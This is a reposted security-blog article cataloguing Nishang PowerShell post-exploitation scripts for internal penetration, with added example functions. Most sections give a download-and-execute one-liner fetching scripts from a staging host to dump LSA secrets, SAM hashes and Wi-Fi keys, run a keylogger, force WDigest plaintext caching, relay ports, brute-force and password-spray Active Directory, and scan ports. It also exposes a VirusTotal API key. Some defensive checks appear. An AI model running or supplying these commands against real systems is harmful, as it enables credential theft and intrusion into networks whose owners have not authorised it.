Some PowerShell Scripts Used in Internal Network Penetration (Part 2)

admin | 2021-12-29 07:05:13 | 98 views | 5180 characters

Get-Information

Information gathering: Run-dialog history (FTP accesses, share connections, PuTTY connections), drives, installed applications, the hosts file, processes and wireless network records:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-Information.ps1'); Get-Information"
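The artefacts listed above all come from well-known, user-readable locations. The following is an added example, not code from the original post or from Nishang, that reads those same sources natively so you can see what Get-Information collects and where a defender would look; the function name Get-HostArtifacts is ours, and no elevation is needed.

```powershell
function Get-HostArtifacts {
    # Added example, not Nishang code: the standard locations Get-Information reads.
    # Everything here is readable as a normal user (HKCU and the hosts file).
    [CmdletBinding()]
    param()

    $result = [ordered]@{}

    # Run dialog (Win+R) history. Values look like "\\fileserver\share\1" or
    # "ftp://10.0.0.5\1"; the trailing "\1" is Explorer's marker, not part of the command.
    $runMru = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (Test-Path $runMru) {
        $key = Get-Item $runMru
        $result.RunHistory = @($key.GetValueNames() |
            Where-Object { $_ -ne 'MRUList' } |
            ForEach-Object { $key.GetValue($_) -replace '\\1$', '' })
    }

    # Persistent mapped drives: HKCU\Network\<letter> holds the UNC path.
    if (Test-Path 'HKCU:\Network') {
        $result.MappedDrives = @(Get-ChildItem 'HKCU:\Network' | ForEach-Object {
            '{0}: -> {1}' -f $_.PSChildName, (Get-ItemProperty $_.PSPath).RemotePath
        })
    }

    # PuTTY saved sessions: host, port and (if stored) user name. Session names are URL-encoded.
    $putty = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (Test-Path $putty) {
        $result.PuttySessions = @(Get-ChildItem $putty | ForEach-Object {
            $p = Get-ItemProperty $_.PSPath
            '{0}: {1}@{2}:{3}' -f [uri]::UnescapeDataString($_.PSChildName), $p.UserName, $p.HostName, $p.PortNumber
        })
    }

    # hosts file with comments and blank lines dropped: static overrides often point at internal systems.
    $hosts = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
    $result.HostsEntries = @(Get-Content $hosts -ErrorAction SilentlyContinue |
        Where-Object { $_ -match '\S' -and $_ -notmatch '^\s*#' })

    # Saved Wi-Fi profile names from netsh (the indented "... : <name>" lines, locale-independent).
    # The key itself needs "netsh wlan show profile name=<name> key=clear" per profile,
    # which is what Get-WLAN-Keys does.
    $result.WlanProfiles = @(netsh wlan show profiles | ForEach-Object {
        if ($_ -match '^\s{4}\S.*?\s:\s(.+)$') { $Matches[1].Trim() }
    })

    # Running processes with image path, for diffing against a known-good baseline.
    $result.Processes = Get-Process | Where-Object Path | Select-Object Name, Id, Path

    [pscustomobject]$result
}

Get-HostArtifacts | Format-List
```

Each collector is guarded with Test-Path so the function still returns the rest when PuTTY or mapped drives are absent on a host.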


Get-LSASecret

Retrieve LSA secrets from the target. Reading the HKLM\SECURITY hive requires a SYSTEM token, not just local administrator; from an elevated shell, Nishang's Escalation\Enable-DuplicateToken is one way to obtain one before calling this.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-LSASecret.ps1'); Get-LsaSecret"

Get-PassHashes

Dump the local account password hashes (reads the SAM, so it needs an elevated shell):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHashes.ps1'); Get-PassHashes"

Get-WLAN-Keys:

Dump saved wireless profiles with their keys in clear text (wraps `netsh wlan show profile name=<profile> key=clear` for every stored profile):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-WLAN-Keys.ps1'); Get-WLAN-Keys"


Keylogger

Keylogger (not tested by the author):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Keylogger.ps1'); Keylogger"

 

Invoke-MimikatzWdigestDowngrade

Dumps clear-text user passwords on Windows 8.1 and Server 2012 by re-enabling WDigest credential caching (the author's test failed). The function Nishang defines is `Invoke-MimikatzWDigestDowngrade`; calling it without the `Invoke-` verb, as the original post did, fails before anything runs. The registry change only affects credentials cached at the next logon, which is why the script locks the workstation and waits for the user to sign in again; it also needs an elevated shell.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Invoke-MimikatzWDigestDowngrade.ps1'); Invoke-MimikatzWDigestDowngrade"
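The "downgrade" is a single registry value. The following added example (not code from the original post or from Nishang) shows that value with an elevation check, the attacker-side change and the defender-side check beside each other; the function names are ours.

```powershell
# Added example, not Nishang code: the one registry value the WDigest downgrade relies on.
$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Test-IsAdmin {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-WDigestState {
    # Returns 'Enabled' (LSASS keeps the plaintext password of new logons),
    # 'Disabled', or 'NotSet'. On Windows 8.1 / Server 2012 R2 an absent value
    # means disabled; on older systems with KB2871997 it must be set to 0 explicitly.
    $v = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    if ($null -eq $v) { 'NotSet' } elseif ($v -eq 1) { 'Enabled' } else { 'Disabled' }
}

function Set-WDigestCaching {
    param([Parameter(Mandatory)][bool]$Enable)
    if (-not (Test-IsAdmin)) { throw 'Writing under HKLM requires an elevated shell.' }
    # Set-ItemProperty creates the value if it does not exist yet.
    Set-ItemProperty -Path $WDigestKey -Name UseLogonCredential -Type DWord -Value ([int]$Enable)
    # The value only applies to credentials cached by future logons; LSASS does not
    # retroactively store plaintext for sessions that already exist.
}

# Attacker side: Set-WDigestCaching -Enable $true, then wait for a fresh logon before dumping.
# Defender side: the hardened state is 0 (or NotSet on 8.1/2012 R2), and any write to this value is worth an alert.
"WDigest plaintext caching: $(Get-WDigestState)"
```

The hardened configuration is `Set-WDigestCaching -Enable $false`; auditing the key for writes catches the downgrade before the next logon happens.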

 

Get-PassHints

Retrieve the password hints of local Windows users from the target (stored in the SAM, so an elevated shell is needed):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHints.ps1'); Get-PassHints"

Pivot

Create-MultipleSessions

Checks a credential against multiple computers and optionally creates a PSSession on each one that accepts it:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Create-MultipleSessions.ps1');  Create-MultipleSessions -filename .\servers.txt"

Examples (from the script's help):

PS > Create-MultipleSessions -filename .\servers.txt
Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt
 
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -Creds
Above command asks the user to provide username and password to check on remote computers.
 
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -CreateSessions
Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.
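The three modes above map onto one native pattern: try to open a WinRM session per host and keep the ones that succeed. The following is an added example, not code from the original post or from Nishang; the function name is ours and servers.txt is the host list from the page.

```powershell
function Test-CredentialOnHosts {
    # Added example, not Nishang code: the pattern behind Create-MultipleSessions.
    # An open session proves the credential is valid AND has remoting rights on that host.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [pscredential]$Credential,      # omit to use the current logon token, as the first example above does
        [switch]$KeepSessions,
        [int]$TimeoutSec = 5
    )
    $option = New-PSSessionOption -OpenTimeout ($TimeoutSec * 1000)
    foreach ($target in $ComputerName) {
        $params = @{ ComputerName = $target; SessionOption = $option; ErrorAction = 'Stop' }
        if ($Credential) { $params.Credential = $Credential }
        try {
            $session = New-PSSession @params
            if (-not $KeepSessions) { Remove-PSSession $session; $session = $null }
            [pscustomobject]@{ Host = $target; Access = $true;  Session = $session; Error = $null }
        } catch {
            # "Access is denied" means the host answered and rejected the credential;
            # "cannot connect" or a timeout means WinRM is not reachable, which says nothing about the password.
            [pscustomobject]@{ Host = $target; Access = $false; Session = $null; Error = $_.Exception.Message }
        }
    }
}

# Usage, mirroring the three examples above:
#   $hosts = Get-Content .\servers.txt
#   Test-CredentialOnHosts -ComputerName $hosts                                # current token
#   Test-CredentialOnHosts -ComputerName $hosts -Credential (Get-Credential)   # prompted credential
#   $live = Test-CredentialOnHosts -ComputerName $hosts -KeepSessions | Where-Object Access
#   Invoke-Command -Session $live.Session -ScriptBlock { hostname }
```

Keep the Error column: it separates "wrong password" from "no WinRM", which a bare true/false hides.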

 

Run-EXEonRemote (not tested by the author)

Copies an executable to multiple computers and runs it on each. Note that `Invoke-Command -FilePath` reads the script from the local disk of the machine you type this on, so Run-EXEonRemote.ps1 must already be present there; the in-memory download in front of it does not put that file on disk.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Run-EXEonRemote.ps1');  Invoke-Command -FilePath .\Run-EXEonRemote.ps1 -ComputerName (Get-Content .\servers.txt)"

Invoke-NetworkRelay

Invoke-NetworkRelay creates network relays (port forwards) between computers using netsh portproxy rules, which need an elevated shell on the host that listens:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Invoke-NetworkRelay.ps1');  Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22  -ConnectPort 445 -ComputerName 192.168.254.141"
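Underneath, a v4tov4 relay is one netsh portproxy rule. The following added example (not code from the original post or from Nishang) adds, lists and removes such a rule and shows the registry location a defender can check without netsh; the function names are ours and the addresses are the ones from the command above.

```powershell
function Add-PortRelay {
    # Added example, not Nishang code: the netsh portproxy rule a v4tov4 relay consists of.
    # Needs an elevated shell and a running IP Helper (iphlpsvc) service.
    param(
        [Parameter(Mandatory)][string]$ListenAddress,
        [Parameter(Mandatory)][int]$ListenPort,
        [Parameter(Mandatory)][string]$ConnectAddress,
        [Parameter(Mandatory)][int]$ConnectPort
    )
    netsh interface portproxy add v4tov4 "listenaddress=$ListenAddress" "listenport=$ListenPort" "connectaddress=$ConnectAddress" "connectport=$ConnectPort" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "netsh add failed with exit code $LASTEXITCODE" }
}

function Remove-PortRelay {
    param([Parameter(Mandatory)][string]$ListenAddress, [Parameter(Mandatory)][int]$ListenPort)
    netsh interface portproxy delete v4tov4 "listenaddress=$ListenAddress" "listenport=$ListenPort" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "netsh delete failed with exit code $LASTEXITCODE" }
}

function Get-PortRelay {
    # Parses the table printed by `netsh interface portproxy show v4tov4` into objects.
    netsh interface portproxy show v4tov4 | ForEach-Object {
        if ($_ -match '^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$') {
            [pscustomobject]@{ Listen = "$($Matches[1]):$($Matches[2])"; Connect = "$($Matches[3]):$($Matches[4])" }
        }
    }
}

function Get-PortRelayFromRegistry {
    # Defender view: the rules persist here across reboots, so a forgotten relay is a finding.
    # Value name is "listenaddr/port", data is "connectaddr/port".
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    if (Test-Path $key) {
        $item = Get-Item $key
        $item.GetValueNames() | ForEach-Object {
            [pscustomobject]@{ Listen = $_; Connect = $item.GetValue($_) }
        }
    }
}

# The same relay as the Invoke-NetworkRelay example above, typed on the host that listens:
#   Add-PortRelay -ListenAddress 192.168.254.141 -ListenPort 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445
#   Get-PortRelay; Get-PortRelayFromRegistry
#   Remove-PortRelay -ListenAddress 192.168.254.141 -ListenPort 8888   # clean up when done
```

Because the rule survives reboots, removing it at the end of the engagement is part of the job, and the registry query is the cheap way to sweep a fleet for leftovers.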

Prasadhak

Prasadhak

Checks the hashes of running processes against the VirusTotal database. One lookup is made per hash, the public VirusTotal API is limited to 4 requests per minute, and the hash of every running binary is sent to a third party, which matters on engagements with confidentiality constraints:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Prasadhak/Prasadhak.ps1');  Prasadhak -APIKEY 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0"

Scan

Brute-Force

Brute force: FTP, Active Directory, MSSQL, SharePoint (`-Service` takes FTP, ActiveDirectory, SQL or SharePoint). Against Active Directory, check the domain lockout threshold before running a password list: more failed attempts per account than the threshold allows locks the accounts out.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Invoke-BruteForce.ps1');  Invoke-BruteForce"

Examples (from the script's help):

.EXAMPLE
PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt
 
.EXAMPLE
PS > Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose
Brute force a Domain Controller of targetdomain.com for users listed in users.txt and passwords in wordlist.txt.
Since StopOnSuccess is specified, the brute forcing stops on first success.
 
.EXAMPLE
PS > cat C:\test\servers.txt | Invoke-BruteForce -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
Brute force SQL Service on all the servers specified in servers.txt
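The Active Directory example above walks a whole word list per user, which is exactly what trips account lockout. The following is an added example, not code from the original post or from Nishang: it reads the domain lockout threshold first and then sprays one password across all users per pass, using the same simple bind a per-pair check does. The domain, file names and password in the usage line are placeholders.

```powershell
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

function Get-DomainLockoutThreshold {
    # Reads "Lockout threshold" from `net accounts /domain`; 0 means accounts never lock.
    $line = net accounts /domain 2>$null | Where-Object { $_ -match 'Lockout threshold' }
    if ($line -and $line -match ':\s*(\S+)\s*$') {
        if ($Matches[1] -eq 'Never') { 0 } else { [int]$Matches[1] }
    }
}

function Invoke-PasswordSpray {
    # Added example, not Nishang code. Outer loop is the password, inner loop the user,
    # so each account sees one failed attempt per pass. Every failure is still a
    # bad-password event on the DC (4771/4776), so this is loud, just not locking.
    param(
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][string[]]$UserList,
        [Parameter(Mandatory)][string[]]$PasswordList,
        [switch]$StopOnSuccess
    )
    $threshold = Get-DomainLockoutThreshold
    if ($threshold -gt 0 -and $PasswordList.Count -ge $threshold) {
        throw "Lockout threshold is $threshold and $($PasswordList.Count) passwords were supplied; this would lock every account. Use fewer passwords per observation window."
    }
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList 'Domain', $Domain
    foreach ($pw in $PasswordList) {
        foreach ($user in $UserList) {
            $ok = $ctx.ValidateCredentials($user, $pw)   # simple bind against a DC
            [pscustomobject]@{ User = $user; Password = $pw; Valid = $ok }
            if ($ok -and $StopOnSuccess) { return }
        }
    }
}

# Usage (placeholders):
#   Invoke-PasswordSpray -Domain corp.local -UserList (Get-Content .\users.txt) -PasswordList @('Winter2021!') |
#       Where-Object Valid
```

The threshold check is deliberately a hard stop rather than a warning: locking out a domain's users is the one outcome an assessment must not produce.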

Port-Scan

端口扫描:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Port-Scan.ps1');  Port-Scan -StartAddress 192.168.4.1 -EndAddress 192.168.4.254"

Parameters and examples (from the script's help):

.PARAMETER TimeOut
Time (in MilliSeconds) before TimeOut, Default set to 100
 
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
 
.EXAMPLE  (sweep the whole range for live hosts and resolve their names)
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
 
.EXAMPLE  (scan the default ports)
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
Use above to do a port scan on default ports.
 
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
 
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80
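The -TimeOut parameter above is the whole point of a PowerShell port scanner: a blocking connect can hang for tens of seconds on a filtered port. The following is an added example, not code from the original post or from Nishang, of a TCP connect scan with a bounded per-port timeout plus a range expander matching -StartAddress/-EndAddress; the function names and the default port list are ours.

```powershell
function Test-TcpPorts {
    # Added example, not Nishang code: TCP connect scan with a real per-port timeout,
    # the mechanism behind Port-Scan -ScanPort. Default ports are ours.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$ComputerName,
        [int[]]$Port = @(21, 22, 80, 135, 139, 443, 445, 3389, 5985),
        [int]$TimeoutMs = 500
    )
    process {
        foreach ($p in $Port) {
            $client = New-Object System.Net.Sockets.TcpClient
            try {
                # ConnectAsync + Wait gives a bounded timeout; a plain Connect() can block
                # for ~20 s on a filtered port and makes a /24 sweep impractical.
                if ($client.ConnectAsync($ComputerName, $p).Wait($TimeoutMs)) { $state = 'open' }
                else { $state = 'filtered' }          # neither SYN/ACK nor RST within the timeout
            } catch [System.AggregateException] {
                $state = 'closed'                     # RST: actively refused (or name resolution failed)
            } catch {
                $state = 'error'
            } finally {
                $client.Close()
            }
            [pscustomobject]@{ Host = $ComputerName; Port = $p; State = $state }
        }
    }
}

function Get-IPv4Range {
    # Expands Start..End (inclusive) into dotted addresses, like Port-Scan's -StartAddress/-EndAddress.
    param([Parameter(Mandatory)][string]$Start, [Parameter(Mandatory)][string]$End)
    $toInt = {
        param($ip)
        $o = $ip.Split('.') | ForEach-Object { [long]$_ }
        ($o[0] * 16777216) + ($o[1] * 65536) + ($o[2] * 256) + $o[3]
    }
    for ($i = & $toInt $Start; $i -le (& $toInt $End); $i++) {
        '{0}.{1}.{2}.{3}' -f (($i -shr 24) -band 255), (($i -shr 16) -band 255), (($i -shr 8) -band 255), ($i -band 255)
    }
}

# Usage: the same range as the examples above, two ports, open results only.
#   Get-IPv4Range 192.168.0.1 192.168.0.254 | Test-TcpPorts -Port 80,445 -TimeoutMs 300 | Where-Object State -eq open
```

This scans sequentially, so the worst case for a /24 is hosts times ports times the timeout; it is fine for a few ports and is easy to wrap in runspaces when it is not.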

Utility scripts:

Download

Download a file onto the target:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Utility/Download.ps1'); Download http://192.168.4.4/php.txt netfile.txt"

Default download path (the `%TEMP%` of the account running the script), for example:

C:\Users\Administrator\AppData\Local\Temp

Import all scripts at once as a module, or dot-source a single script:

PS > Import-Module .\nishang.psm1

PS > . C:\nishang\Gather\Get-Information.ps1

PS > Get-Information

PS > Get-Help [scriptname] -Full       # show a script's help
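Every command on this page instead loads the script in memory with `IEX (New-Object Net.WebClient).DownloadString(...)`, which executes whatever the staging host at 192.168.4.4 serves, over plain HTTP, with no integrity check. The following is an added example, not code from the original post or from Nishang, that keeps the in-memory pattern but pins the downloaded bytes to a SHA256 you computed from the copy you reviewed; the function name is ours and the URL and hash in the usage lines are placeholders. On current Windows builds AMSI scans the script block when it is created, so in-memory loading is not an evasion by itself.

```powershell
function Get-VerifiedScript {
    # Added example, not Nishang code: download a script, refuse it unless its SHA256
    # matches, and return it as a script block for the caller to dot-source.
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$Sha256   # hex digest of the file you actually intend to run
    )
    # Lets the same function work against an https staging server; http:// offers no integrity at all.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    $bytes = (New-Object Net.WebClient).DownloadData($Url)

    # Hash the raw bytes so the digest matches Get-FileHash on the reviewed file.
    $actual = ([Security.Cryptography.SHA256]::Create().ComputeHash($bytes) |
               ForEach-Object { $_.ToString('x2') }) -join ''
    if ($actual -ne $Sha256) {
        throw "Refusing to load $Url : SHA256 $actual does not match expected $Sha256"
    }

    # StreamReader honours a BOM, so the text is decoded the same way PowerShell reads the file.
    $reader = New-Object IO.StreamReader -ArgumentList (New-Object IO.MemoryStream -ArgumentList (,$bytes))
    $text = $reader.ReadToEnd()
    [scriptblock]::Create($text)
}

# Usage: compute the expected hash once, locally, from the script you reviewed,
# then dot-source the returned block so its functions land in the current scope,
# exactly as ". C:\nishang\Gather\Get-Information.ps1" would.
#   $expected = (Get-FileHash -Algorithm SHA256 .\Gather\Get-Information.ps1).Hash
#   . (Get-VerifiedScript -Url 'http://192.168.4.4/nishang/nishang-master/Gather/Get-Information.ps1' -Sha256 $expected)
#   Get-Information
```

The function returns the script block rather than dot-sourcing it itself, because a dot-source inside a function only defines the script's functions in the function's own scope.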


This article first appeared on the WeChat public account 关注安全技术: 一些内网渗透所用Poweshell脚本(二)

admin, 2021-12-29 07:05:13. Reposts should keep the source link (CN-SEC, with thanks to the original author): http://cn-sec.com/archives/502671.html
